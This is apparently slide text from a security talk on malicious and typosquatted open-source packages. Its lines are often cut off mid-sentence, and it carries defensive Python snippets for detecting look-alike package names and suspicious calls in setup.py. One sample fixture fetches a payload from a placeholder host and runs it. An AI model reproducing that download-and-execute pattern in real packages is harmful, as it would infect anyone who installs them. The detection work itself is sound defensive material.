developing digital products/services
• Open source software makes up at least 70% of all software
  ◦ Source: 2020 Synopsys report
“Software is eating the world” - Marc Andreessen, 2011
“Open-source software is eating the world” - Everybody, 2021
on Package Managers
  ◦ Example: PyPI hosts over 300K Python packages
• Code is “sourced” from Package Managers by installing
  ◦ Example: pip3 install dateutils
  ◦ Individual developers, groups, and companies
• Software we use on our servers, laptops, phones, coffee makers, baby monitors, <add your favorite digital device here> is written by unknown volunteers
  ◦ Which we blindly TRUST?
bugs introduced accidentally,
  ◦ Example: buffer overflow (due to missing bounds checks)
• Pose indirect threats
  ◦ Need an exploit to trigger the buggy code
  ◦ May not always have a high impact
• Can be fixed by upgrading to the latest version/release
their packages using their credentials
• No checks or code vetting
• Packages are searched for and installed by name
  ◦ Package Managers (e.g., PyPI, NPM) do not show source code
• Bad actors exploit new attack vectors to propagate malware
Exploits name typos during installation or developer inexperience
- Removes safeguards: anyone on the same network can execute code on your machine with a single HTTP request
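The name-typo attack above can be made concrete with a small check. The following is only a minimal sketch, not how any package manager or the scanner discussed in this talk works: the `POPULAR_PACKAGES` list, the `possible_typosquats` helper, and the 0.85 similarity threshold are all hypothetical choices made for illustration. It flags a requested name that closely resembles, but does not equal, a well-known package name.

```python
import re
from difflib import SequenceMatcher

# Hypothetical short list; a real tool would load the registry's
# most-downloaded package names instead.
POPULAR_PACKAGES = ["requests", "numpy", "python-dateutil", "urllib3", "django"]


def normalize(name):
    """Lowercase the name and collapse runs of '-', '_' and '.' (PEP 503 style)."""
    return re.sub(r"[-_.]+", "-", name).lower()


def possible_typosquats(name, popular=POPULAR_PACKAGES, threshold=0.85):
    """Return popular names that `name` closely resembles but does not equal."""
    candidate = normalize(name)
    hits = []
    for known in popular:
        known_norm = normalize(known)
        if candidate == known_norm:
            return []  # exact match: the user asked for the popular package itself
        # ratio() is 1.0 for identical strings and falls as they diverge
        if SequenceMatcher(None, candidate, known_norm).ratio() >= threshold:
            hits.append(known)
    return hits


if __name__ == "__main__":
    for requested in ["requests", "reqeusts", "flask"]:
        print(requested, "->", possible_typosquats(requested))
```

A check like this only catches look-alike names. It does nothing against a malicious package with an unrelated name, and the threshold trades false alarms against missed typos.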
programming bug),
  ◦ Example: backdoor installed to steal sensitive data
• Poses direct and dangerous threats
  ◦ Doesn’t need an exploit: it is itself an exploit (e.g., triggered on installation)
  ◦ Is obfuscated to avoid detection
  ◦ Hidden in popular packages for wider reach
  ◦ Evasive: may only trigger under narrow conditions (e.g., production)
• Can only be fixed by yanking the malicious package/dependency version
is inferred from
  ◦ Number of GitHub stars/forks
  ◦ Number of open issues on GitHub
  ◦ Number of downloads
  ◦ Project documentation/website
  ◦ Number of recent code commits
  ◦ Number of test cases
  ◦ Backing companies (e.g., FB, Uber)
• BUT,
  ◦ Stars/forks/downloads are attacker-controlled
  ◦ Impersonated projects have the same website/documentation/tests/commits
  ◦ Should we look at the package code and hundreds of dependencies?
Graduated Dec’20, Georgia Tech
- Cybersecurity/Systems research
- Creator of ExtFUSE file system
- eBPF + FUSE = Much faster FUSE
- Created a 32-bit x86 OS (Capital) that boots from a 5.25” floppy disk
Tech in 2019
  ◦ Downloaded and analyzed over 1.3M NPM+PyPI+RubyGems packages (60 TB)
  ◦ Detected 339 previously unknown malicious packages (82% confirmed, 3 CVEs, many over a year old)
  ◦ Details in academic paper: https://arxiv.org/pdf/2002.01139.pdf
• Funded by NSF to continue development
• Continuous scanning of packages
  ◦ PyPI supported (more coming soon!)
setup.py script downloads and spawns a Python file (the download server is now unreachable)
- A comment claims it is for security testing only, but the payload is unavailable
MALWARE
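To illustrate how a download-and-spawn pattern in setup.py might be spotted without running it, here is a minimal static-analysis sketch. It is not the scanner described in this talk. The `SUSPICIOUS_CALLS` watchlist, the helper names, and the `SAMPLE_SETUP` text (including its placeholder URL) are hypothetical and chosen only for illustration. The code parses the source with Python's `ast` module and reports calls on the watchlist; the sample is never executed.

```python
import ast

# Hypothetical, deliberately small watchlist; illustrative, not exhaustive.
SUSPICIOUS_CALLS = {
    "urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get",
    "subprocess.Popen", "subprocess.call", "subprocess.run",
    "os.system", "exec", "eval",
}


def dotted_name(node):
    """Rebuild a dotted name such as 'os.system' from an AST node, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def flag_suspicious_calls(source):
    """Return sorted (line, call) pairs for watchlisted calls in the source text."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func)
            if name in SUSPICIOUS_CALLS:
                findings.append((node.lineno, name))
    return sorted(findings)


# Made-up setup.py text that mimics the pattern; it is parsed, never run.
SAMPLE_SETUP = '''
import os
import urllib.request
from setuptools import setup

urllib.request.urlretrieve("http://example.invalid/payload.py", "/tmp/payload.py")
os.system("python /tmp/payload.py")
setup(name="demo")
'''

if __name__ == "__main__":
    for line, call in flag_suspicious_calls(SAMPLE_SETUP):
        print(f"line {line}: {call}")
```

Name matching like this is easy to evade with import aliases, `getattr`, or obfuscated strings, so it should be read as a first-pass filter, not a verdict.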